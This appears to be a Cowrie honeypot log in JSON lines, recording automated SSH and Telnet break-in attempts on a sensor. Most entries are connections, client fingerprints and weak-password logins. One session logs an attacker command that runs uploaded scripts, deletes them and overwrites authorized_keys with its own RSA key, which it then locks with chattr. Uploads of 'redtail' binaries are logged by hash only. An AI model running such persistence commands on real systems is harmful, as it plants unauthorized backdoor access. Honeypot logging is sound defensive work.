{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":59050,"dst_ip":"1.2.3.4","dst_port":22,"session":"d8c347074905","protocol":"ssh","message":"New connection: 212.227.125.160:59050 (1.2.3.4:22) [session: d8c347074905]","sensor":"my-vps","timestamp":"2025-09-09T08:51:14.420709Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-09T08:51:14.421400Z","src_ip":"212.227.125.160","session":"d8c347074905"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-09-09T08:51:14.468907Z","src_ip":"212.227.125.160","session":"d8c347074905"}
{"eventid":"cowrie.login.success","username":"root","password":"coa","message":"login attempt [root/coa] succeeded","sensor":"my-vps","timestamp":"2025-09-09T08:51:14.613567Z","src_ip":"212.227.125.160","session":"d8c347074905"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":60860,"dst_ip":"1.2.3.4","dst_port":23,"session":"c9536d592d57","protocol":"telnet","message":"New connection: 212.227.125.160:60860 (1.2.3.4:23) [session: c9536d592d57]","sensor":"my-vps","timestamp":"2025-09-09T08:51:15.504746Z"}
{"eventid":"cowrie.session.closed","duration":0.0011150836944580078,"message":"Connection lost after 0 seconds","sensor":"my-vps","timestamp":"2025-09-09T08:51:15.505793Z","src_ip":"212.227.125.160","session":"c9536d592d57"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:51:25.372322Z","src_ip":"212.227.125.160","session":"d8c347074905"}
{"eventid":"cowrie.command.input","input":"chmod +x clean.sh; sh clean.sh; rm -rf clean.sh; chmod +x setup.sh; sh setup.sh; rm -rf setup.sh; mkdir -p ~/.ssh; chattr -ia ~/.ssh/authorized_keys; echo \"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCqHrvnL6l7rT/mt1AdgdY9tC1GPK216q0q/7neNVqm7AgvfJIM3ZKniGC3S5x6KOEApk+83GM4IKjCPfq007SvT07qh9AscVxegv66I5yuZTEaDAG6cPXxg3/0oXHTOTvxelgbRrMzfU5SEDAEi8+ByKMefE+pDVALgSTBYhol96hu1GthAMtPAFahqxrvaRR4nL4ijxOsmSLREoAb1lxiX7yvoYLT45/1c5dJdrJrQ60uKyieQ6FieWpO2xF6tzfdmHbiVdSmdw0BiCRwe+fuknZYQxIC1owAj2p5bc+nzVTi3mtBEk9rGpgBnJ1hcEUslEf/zevIcX8+6H7kUMRr rsa-key-20230629\" > ~/.ssh/authorized_keys; chattr +ai ~/.ssh/authorized_keys; uname -a; echo -e \"\\x61\\x75\\x74\\x68\\x5F\\x6F\\x6B\\x0A\"","message":"CMD: chmod +x clean.sh; sh clean.sh; rm -rf clean.sh; chmod +x setup.sh; sh setup.sh; rm -rf setup.sh; mkdir -p ~/.ssh; chattr -ia ~/.ssh/authorized_keys; echo \"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCqHrvnL6l7rT/mt1AdgdY9tC1GPK216q0q/7neNVqm7AgvfJIM3ZKniGC3S5x6KOEApk+83GM4IKjCPfq007SvT07qh9AscVxegv66I5yuZTEaDAG6cPXxg3/0oXHTOTvxelgbRrMzfU5SEDAEi8+ByKMefE+pDVALgSTBYhol96hu1GthAMtPAFahqxrvaRR4nL4ijxOsmSLREoAb1lxiX7yvoYLT45/1c5dJdrJrQ60uKyieQ6FieWpO2xF6tzfdmHbiVdSmdw0BiCRwe+fuknZYQxIC1owAj2p5bc+nzVTi3mtBEk9rGpgBnJ1hcEUslEf/zevIcX8+6H7kUMRr rsa-key-20230629\" > ~/.ssh/authorized_keys; chattr +ai ~/.ssh/authorized_keys; uname -a; echo -e \"\\x61\\x75\\x74\\x68\\x5F\\x6F\\x6B\\x0A\"","sensor":"my-vps","timestamp":"2025-09-09T08:51:25.372984Z","src_ip":"212.227.125.160","session":"d8c347074905"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/4a869e4a816476f12d5cd6aab0625c5f6aab97714a486f6b8a5f484cbc8981f6","size":80,"shasum":"4a869e4a816476f12d5cd6aab0625c5f6aab97714a486f6b8a5f484cbc8981f6","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/4a869e4a816476f12d5cd6aab0625c5f6aab97714a486f6b8a5f484cbc8981f6 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T08:51:25.421778Z","src_ip":"212.227.125.160","session":"d8c347074905"}
{"eventid":"cowrie.session.file_upload","filename":"clean.sh","outfile":"var/lib/cowrie/downloads/d46555af1173d22f07c37ef9c1e0e74fd68db022f2b6fb3ab5388d2c5bc6a98e","shasum":"d46555af1173d22f07c37ef9c1e0e74fd68db022f2b6fb3ab5388d2c5bc6a98e","message":"SFTP Uploaded file \"clean.sh\" to var/lib/cowrie/downloads/d46555af1173d22f07c37ef9c1e0e74fd68db022f2b6fb3ab5388d2c5bc6a98e","sensor":"my-vps","timestamp":"2025-09-09T08:51:25.469717Z","src_ip":"212.227.125.160","session":"d8c347074905"}
{"eventid":"cowrie.session.file_upload","filename":"redtail.arm7","outfile":"var/lib/cowrie/downloads/229496b55d0668a40fe3d969ba4e942dc2c2fd7452b3d6f79c6beb0db631dc12","shasum":"229496b55d0668a40fe3d969ba4e942dc2c2fd7452b3d6f79c6beb0db631dc12","message":"SFTP Uploaded file \"redtail.arm7\" to var/lib/cowrie/downloads/229496b55d0668a40fe3d969ba4e942dc2c2fd7452b3d6f79c6beb0db631dc12","sensor":"my-vps","timestamp":"2025-09-09T08:51:25.471724Z","src_ip":"212.227.125.160","session":"d8c347074905"}
{"eventid":"cowrie.session.file_upload","filename":"redtail.arm8","outfile":"var/lib/cowrie/downloads/89782d8142297907c9962eebdae29c28df86805a99f38a683ab55c8fa1596dd8","shasum":"89782d8142297907c9962eebdae29c28df86805a99f38a683ab55c8fa1596dd8","message":"SFTP Uploaded file \"redtail.arm8\" to var/lib/cowrie/downloads/89782d8142297907c9962eebdae29c28df86805a99f38a683ab55c8fa1596dd8","sensor":"my-vps","timestamp":"2025-09-09T08:51:25.474168Z","src_ip":"212.227.125.160","session":"d8c347074905"}
{"eventid":"cowrie.session.file_upload","filename":"redtail.i686","outfile":"var/lib/cowrie/downloads/ee7a31fb0d3c29ca435f08fd147a434c6db921b69d32c8894539a8199b0b15c0","shasum":"ee7a31fb0d3c29ca435f08fd147a434c6db921b69d32c8894539a8199b0b15c0","message":"SFTP Uploaded file \"redtail.i686\" to var/lib/cowrie/downloads/ee7a31fb0d3c29ca435f08fd147a434c6db921b69d32c8894539a8199b0b15c0","sensor":"my-vps","timestamp":"2025-09-09T08:51:25.476452Z","src_ip":"212.227.125.160","session":"d8c347074905"}
{"eventid":"cowrie.session.file_upload","filename":"redtail.x86_64","outfile":"var/lib/cowrie/downloads/d6e0eb28cfe1b224f061eff0581091dac985516c78d222f4921587d2ec612010","shasum":"d6e0eb28cfe1b224f061eff0581091dac985516c78d222f4921587d2ec612010","message":"SFTP Uploaded file \"redtail.x86_64\" to var/lib/cowrie/downloads/d6e0eb28cfe1b224f061eff0581091dac985516c78d222f4921587d2ec612010","sensor":"my-vps","timestamp":"2025-09-09T08:51:25.479064Z","src_ip":"212.227.125.160","session":"d8c347074905"}
{"eventid":"cowrie.session.file_upload","filename":"setup.sh","outfile":"var/lib/cowrie/downloads/783adb7ad6b16fe9818f3e6d48b937c3ca1994ef24e50865282eeedeab7e0d59","shasum":"783adb7ad6b16fe9818f3e6d48b937c3ca1994ef24e50865282eeedeab7e0d59","message":"SFTP Uploaded file \"setup.sh\" to var/lib/cowrie/downloads/783adb7ad6b16fe9818f3e6d48b937c3ca1994ef24e50865282eeedeab7e0d59","sensor":"my-vps","timestamp":"2025-09-09T08:51:25.480091Z","src_ip":"212.227.125.160","session":"d8c347074905"}
{"eventid":"cowrie.session.closed","duration":"11.1","message":"Connection lost after 11.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T08:51:25.528800Z","src_ip":"212.227.125.160","session":"d8c347074905"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43298,"dst_ip":"1.2.3.4","dst_port":23,"session":"a2475ad8fd47","protocol":"telnet","message":"New connection: 212.227.235.229:43298 (1.2.3.4:23) [session: a2475ad8fd47]","sensor":"my-vps","timestamp":"2025-09-09T08:52:16.029169Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":42046,"dst_ip":"1.2.3.4","dst_port":23,"session":"022eaae30c3f","protocol":"telnet","message":"New connection: 212.227.125.160:42046 (1.2.3.4:23) [session: 022eaae30c3f]","sensor":"my-vps","timestamp":"2025-09-09T08:52:25.069526Z"}
{"eventid":"cowrie.session.closed","duration":10.00151252746582,"message":"Connection lost after 10 seconds","sensor":"my-vps","timestamp":"2025-09-09T08:52:26.030616Z","src_ip":"212.227.235.229","session":"a2475ad8fd47"}
{"eventid":"cowrie.session.closed","duration":10.000083923339844,"message":"Connection lost after 10 seconds","sensor":"my-vps","timestamp":"2025-09-09T08:52:35.069539Z","src_ip":"212.227.125.160","session":"022eaae30c3f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37492,"dst_ip":"1.2.3.4","dst_port":23,"session":"89184812abe8","protocol":"telnet","message":"New connection: 212.227.235.229:37492 (1.2.3.4:23) [session: 89184812abe8]","sensor":"my-vps","timestamp":"2025-09-09T08:53:12.334871Z"}
{"eventid":"cowrie.session.closed","duration":10.193780183792114,"message":"Connection lost after 10 seconds","sensor":"my-vps","timestamp":"2025-09-09T08:53:22.528578Z","src_ip":"212.227.235.229","session":"89184812abe8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":58116,"dst_ip":"1.2.3.4","dst_port":23,"session":"6acdac7cbc5c","protocol":"telnet","message":"New connection: 212.227.125.160:58116 (1.2.3.4:23) [session: 6acdac7cbc5c]","sensor":"my-vps","timestamp":"2025-09-09T08:53:23.124753Z"}
{"eventid":"cowrie.session.closed","duration":10.15195894241333,"message":"Connection lost after 10 seconds","sensor":"my-vps","timestamp":"2025-09-09T08:53:33.276625Z","src_ip":"212.227.125.160","session":"6acdac7cbc5c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":47108,"dst_ip":"1.2.3.4","dst_port":23,"session":"f76c22bc9542","protocol":"telnet","message":"New connection: 212.227.235.229:47108 (1.2.3.4:23) [session: f76c22bc9542]","sensor":"my-vps","timestamp":"2025-09-09T08:53:36.864622Z"}
{"eventid":"cowrie.session.closed","duration":0.001481771469116211,"message":"Connection lost after 0 seconds","sensor":"my-vps","timestamp":"2025-09-09T08:53:36.865992Z","src_ip":"212.227.235.229","session":"f76c22bc9542"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":38052,"dst_ip":"1.2.3.4","dst_port":23,"session":"9526a2558ff2","protocol":"telnet","message":"New connection: 212.227.125.160:38052 (1.2.3.4:23) [session: 9526a2558ff2]","sensor":"my-vps","timestamp":"2025-09-09T08:53:44.932603Z"}
{"eventid":"cowrie.session.closed","duration":0.0013179779052734375,"message":"Connection lost after 0 seconds","sensor":"my-vps","timestamp":"2025-09-09T08:53:44.933846Z","src_ip":"212.227.125.160","session":"9526a2558ff2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37204,"dst_ip":"1.2.3.4","dst_port":22,"session":"92fc41ddc3a7","protocol":"ssh","message":"New connection: 212.227.235.229:37204 (1.2.3.4:22) [session: 92fc41ddc3a7]","sensor":"my-vps","timestamp":"2025-09-09T08:54:50.843387Z"}
{"eventid":"cowrie.session.closed","duration":"0.3","message":"Connection lost after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T08:54:51.096303Z","src_ip":"212.227.235.229","session":"92fc41ddc3a7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38496,"dst_ip":"1.2.3.4","dst_port":22,"session":"6d1b1caa7b2c","protocol":"ssh","message":"New connection: 212.227.235.229:38496 (1.2.3.4:22) [session: 6d1b1caa7b2c]","sensor":"my-vps","timestamp":"2025-09-09T08:54:51.346722Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-09T08:54:51.347850Z","src_ip":"212.227.235.229","session":"6d1b1caa7b2c"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-09-09T08:54:51.598395Z","src_ip":"212.227.235.229","session":"6d1b1caa7b2c"}
{"eventid":"cowrie.login.success","username":"root","password":"------fuck------","message":"login attempt [root/------fuck------] succeeded","sensor":"my-vps","timestamp":"2025-09-09T08:54:53.172717Z","src_ip":"212.227.235.229","session":"6d1b1caa7b2c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:54:53.690561Z","src_ip":"212.227.235.229","session":"6d1b1caa7b2c"}
{"eventid":"cowrie.command.input","input":"uname -s -m","message":"CMD: uname -s -m","sensor":"my-vps","timestamp":"2025-09-09T08:54:53.691243Z","src_ip":"212.227.235.229","session":"6d1b1caa7b2c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/6fa4c8ac58e7a1d947dc3250c39d1e27958f012e68061d8de0a7b70e3a65b906","size":13,"shasum":"6fa4c8ac58e7a1d947dc3250c39d1e27958f012e68061d8de0a7b70e3a65b906","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/6fa4c8ac58e7a1d947dc3250c39d1e27958f012e68061d8de0a7b70e3a65b906 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T08:54:53.941780Z","src_ip":"212.227.235.229","session":"6d1b1caa7b2c"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T08:54:53.942977Z","src_ip":"212.227.235.229","session":"6d1b1caa7b2c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":58188,"dst_ip":"1.2.3.4","dst_port":22,"session":"cd76950e2de1","protocol":"ssh","message":"New connection: 212.227.235.229:58188 (1.2.3.4:22) [session: cd76950e2de1]","sensor":"my-vps","timestamp":"2025-09-09T08:55:25.255883Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-09T08:55:25.257023Z","src_ip":"212.227.235.229","session":"cd76950e2de1"}
{"eventid":"cowrie.client.kex","hassh":"f1e5e9d24e5e345e8745613bde22d532","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f1e5e9d24e5e345e8745613bde22d532","sensor":"my-vps","timestamp":"2025-09-09T08:55:25.361834Z","src_ip":"212.227.235.229","session":"cd76950e2de1"}
{"eventid":"cowrie.client.fingerprint","username":"admin","fingerprint":"04:ea:62:c7:5e:d2:d9:5e:10:03:fd:f2:6e:a0:a9:0f","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCzml2PeIHOUG+78TIk0lQcR5JC/mlDElDtplEfq8KDiJFwD8z9Shhk2kG0pwzw9uUr7R24h8lnh9DWpiKfoy4MeMFrTO8akT1hXf4yn9IEEHdiq9hVz1ZkEnUdjyzuvXGIOcRe2FqQaovFY15gSDZzJc5K6NMT8uW1aitHAsYXZDW8uh+/SJAqcCCVUtVnZRj4nlhQxW2810CJGQQrixkkww7F/9XRlddH3HkNuRlZLQMk5oGHTxeySKKfqoAoXgZXac9VBAPRUU+0PrBrOSWlXFbGBPJSdvDfxBqcg4hguacD1EW0/5ORR7Ikp1i6y+gIpdydwxW51yAqrYqHI5iD","type":"ssh-rsa","message":"public key attempt for user admin of type ssh-rsa with fingerprint 04:ea:62:c7:5e:d2:d9:5e:10:03:fd:f2:6e:a0:a9:0f","sensor":"my-vps","timestamp":"2025-09-09T08:55:25.574013Z","src_ip":"212.227.235.229","session":"cd76950e2de1"}
{"eventid":"cowrie.login.failed","username":"admin","fingerprint":"04:ea:62:c7:5e:d2:d9:5e:10:03:fd:f2:6e:a0:a9:0f","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCzml2PeIHOUG+78TIk0lQcR5JC/mlDElDtplEfq8KDiJFwD8z9Shhk2kG0pwzw9uUr7R24h8lnh9DWpiKfoy4MeMFrTO8akT1hXf4yn9IEEHdiq9hVz1ZkEnUdjyzuvXGIOcRe2FqQaovFY15gSDZzJc5K6NMT8uW1aitHAsYXZDW8uh+/SJAqcCCVUtVnZRj4nlhQxW2810CJGQQrixkkww7F/9XRlddH3HkNuRlZLQMk5oGHTxeySKKfqoAoXgZXac9VBAPRUU+0PrBrOSWlXFbGBPJSdvDfxBqcg4hguacD1EW0/5ORR7Ikp1i6y+gIpdydwxW51yAqrYqHI5iD","type":"ssh-rsa","message":"public key login attempt for [admin] failed","sensor":"my-vps","timestamp":"2025-09-09T08:55:25.574638Z","src_ip":"212.227.235.229","session":"cd76950e2de1"}
{"eventid":"cowrie.client.fingerprint","username":"admin","fingerprint":"04:ea:62:c7:5e:d2:d9:5e:10:03:fd:f2:6e:a0:a9:0f","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCzml2PeIHOUG+78TIk0lQcR5JC/mlDElDtplEfq8KDiJFwD8z9Shhk2kG0pwzw9uUr7R24h8lnh9DWpiKfoy4MeMFrTO8akT1hXf4yn9IEEHdiq9hVz1ZkEnUdjyzuvXGIOcRe2FqQaovFY15gSDZzJc5K6NMT8uW1aitHAsYXZDW8uh+/SJAqcCCVUtVnZRj4nlhQxW2810CJGQQrixkkww7F/9XRlddH3HkNuRlZLQMk5oGHTxeySKKfqoAoXgZXac9VBAPRUU+0PrBrOSWlXFbGBPJSdvDfxBqcg4hguacD1EW0/5ORR7Ikp1i6y+gIpdydwxW51yAqrYqHI5iD","type":"ssh-rsa","message":"public key attempt for user admin of type ssh-rsa with fingerprint 04:ea:62:c7:5e:d2:d9:5e:10:03:fd:f2:6e:a0:a9:0f","sensor":"my-vps","timestamp":"2025-09-09T08:55:25.680594Z","src_ip":"212.227.235.229","session":"cd76950e2de1"}
{"eventid":"cowrie.login.failed","username":"admin","fingerprint":"04:ea:62:c7:5e:d2:d9:5e:10:03:fd:f2:6e:a0:a9:0f","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCzml2PeIHOUG+78TIk0lQcR5JC/mlDElDtplEfq8KDiJFwD8z9Shhk2kG0pwzw9uUr7R24h8lnh9DWpiKfoy4MeMFrTO8akT1hXf4yn9IEEHdiq9hVz1ZkEnUdjyzuvXGIOcRe2FqQaovFY15gSDZzJc5K6NMT8uW1aitHAsYXZDW8uh+/SJAqcCCVUtVnZRj4nlhQxW2810CJGQQrixkkww7F/9XRlddH3HkNuRlZLQMk5oGHTxeySKKfqoAoXgZXac9VBAPRUU+0PrBrOSWlXFbGBPJSdvDfxBqcg4hguacD1EW0/5ORR7Ikp1i6y+gIpdydwxW51yAqrYqHI5iD","type":"ssh-rsa","message":"public key login attempt for [admin] failed","sensor":"my-vps","timestamp":"2025-09-09T08:55:25.682930Z","src_ip":"212.227.235.229","session":"cd76950e2de1"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":64584,"dst_ip":"1.2.3.4","dst_port":22,"session":"0bc5aaa4b694","protocol":"ssh","message":"New connection: 217.72.205.35:64584 (1.2.3.4:22) [session: 0bc5aaa4b694]","sensor":"my-vps","timestamp":"2025-09-09T08:55:33.141726Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T08:55:33.142792Z","src_ip":"217.72.205.35","session":"0bc5aaa4b694"}
{"eventid":"cowrie.session.closed","duration":"10.0","message":"Connection lost after 10.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T08:55:35.255872Z","src_ip":"212.227.235.229","session":"cd76950e2de1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38618,"dst_ip":"1.2.3.4","dst_port":23,"session":"ec736634566d","protocol":"telnet","message":"New connection: 212.227.235.229:38618 (1.2.3.4:23) [session: ec736634566d]","sensor":"my-vps","timestamp":"2025-09-09T08:58:47.048099Z"}
{"eventid":"cowrie.login.success","username":"root","password":"adminHW","message":"login attempt [root/adminHW] succeeded","sensor":"my-vps","timestamp":"2025-09-09T08:58:47.267417Z","src_ip":"212.227.235.229","session":"ec736634566d"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:58:47.351938Z","src_ip":"212.227.235.229","session":"ec736634566d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":51824,"dst_ip":"1.2.3.4","dst_port":22,"session":"167d4952117b","protocol":"ssh","message":"New connection: 212.227.125.160:51824 (1.2.3.4:22) [session: 167d4952117b]","sensor":"my-vps","timestamp":"2025-09-09T09:00:36.964314Z"}
{"eventid":"cowrie.session.closed","duration":"0.1","message":"Connection lost after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T09:00:37.030822Z","src_ip":"212.227.125.160","session":"167d4952117b"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","size":473,"shasum":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","duplicate":true,"duration":"180.0","message":"Closing TTY Log: var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 after 180.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T09:01:47.381926Z","src_ip":"212.227.235.229","session":"ec736634566d"}
{"eventid":"cowrie.session.closed","duration":180.3387577533722,"message":"Connection lost after 180 seconds","sensor":"my-vps","timestamp":"2025-09-09T09:01:47.386787Z","src_ip":"212.227.235.229","session":"ec736634566d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":4554,"dst_ip":"1.2.3.4","dst_port":23,"session":"577a05b4146f","protocol":"telnet","message":"New connection: 212.227.235.229:4554 (1.2.3.4:23) [session: 577a05b4146f]","sensor":"my-vps","timestamp":"2025-09-09T09:02:01.279809Z"}
{"eventid":"cowrie.session.closed","duration":13.510914325714111,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-09-09T09:02:14.790648Z","src_ip":"212.227.235.229","session":"577a05b4146f"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":64950,"dst_ip":"1.2.3.4","dst_port":22,"session":"f84ae459a211","protocol":"ssh","message":"New connection: 217.72.205.35:64950 (1.2.3.4:22) [session: f84ae459a211]","sensor":"my-vps","timestamp":"2025-09-09T09:02:20.027828Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T09:02:20.029016Z","src_ip":"217.72.205.35","session":"f84ae459a211"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":51486,"dst_ip":"1.2.3.4","dst_port":22,"session":"9ef9483c57cc","protocol":"ssh","message":"New connection: 217.72.205.35:51486 (1.2.3.4:22) [session: 9ef9483c57cc]","sensor":"my-vps","timestamp":"2025-09-09T09:08:53.713220Z"}
